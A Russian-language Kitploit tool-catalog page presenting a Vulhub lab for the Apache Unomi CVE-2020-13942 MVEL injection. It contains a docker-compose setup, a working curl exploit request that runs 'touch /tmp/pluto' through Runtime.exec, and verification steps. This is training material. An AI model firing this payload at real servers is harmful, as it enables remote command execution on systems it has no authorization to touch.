Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-13942byVulHub — Пошаговая лабораторная среда и эксплойт для Apache Unomi CVE-2020-13942, демонстрирующие внедрение языка выражений MVEL, приводящее к удаленному выполнению кода. | Kitploit
Инструменты/GitHubGitHub/corsisechero/cve-2020-13942byvulhub
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubcorsisechero/cve-2020-13942byvulhub

CVE-2020-13942byVulHub

Пошаговая лабораторная среда и эксплойт для Apache Unomi CVE-2020-13942, демонстрирующие внедрение языка выражений MVEL, приводящее к удаленному выполнению кода.

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-13942 от VulHub


Apache Unomi Expression Language Injection RCE (CVE-2020-13942)

Описание

Эта уязвимость позволяет выполнять произвольные команды в системах, работающих под управлением Apache Unomi версии 1.5.1, используя внедрение языка выражений MVEL.

Страница проекта

GitHub - Vulhub - Unomi CVE-2020-13942


Настройка окружения

Файл Docker Compose (docker-compose.yml)

root@kitploit:~
version: '2'
services:
  web:
    image: vulhub/unomi:1.5.1
    ports:
      - "9443:9443"
      - "8181:8181"
    environment:
      - UNOMI_ELASTICSEARCH_ADDRESSES=elasticsearch:9200
    depends_on:
      - elasticsearch
  elasticsearch:
    image: elasticsearch:7.9.3
    environment:
      - cluster.name=contextElasticSearch
      - discovery.type=single-node
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m"
      - bootstrap.memory_lock=true

Запуск контейнеров

Выполните запуск контейнеров следующей командой:

root@kitploit:~
docker compose up -d

Выполнение эксплойта

Команда для выполнения из Kali

Отправьте следующий запрос POST с помощью curl:

root@kitploit:~
curl -X POST http://localhost:8181/context.json \
     -H "Accept-Encoding: gzip, deflate" \
     -H "Accept: */*" \
     -H "Accept-Language: en" \
     -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36" \
     -H "Connection: close" \
     -H "Content-Type: application/json" \
     -d '{
    "filters": [
        {
            "id": "sample",
            "filters": [
                {
                    "condition": {
                         "parameterValues": {
                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"touch /tmp/pluto\");"
                        },
                        "type": "profilePropertyCondition"
                    }
                }
            ]
        }
    ],
    "sessionId": "sample"
}'

Проверка эксплойта

Доступ к контейнеру

Войдите в контейнер, чтобы проверить создание файла:

root@kitploit:~
docker exec -it af7de05fc47e ls /tmp

Проверка результата

Проверьте наличие файла pluto:

root@kitploit:~
hsperfdata_root  pluto

Если файл pluto присутствует, это означает, что эксплойт удался.


Замечания по безопасности

Эта уязвимость позволяет выполнять произвольные команды. Используйте эти тесты только в контролируемых средах и в учебных или проверочных целях. Эксплуатация уязвимостей в несанкционированных средах незаконна.

Скачать инструмент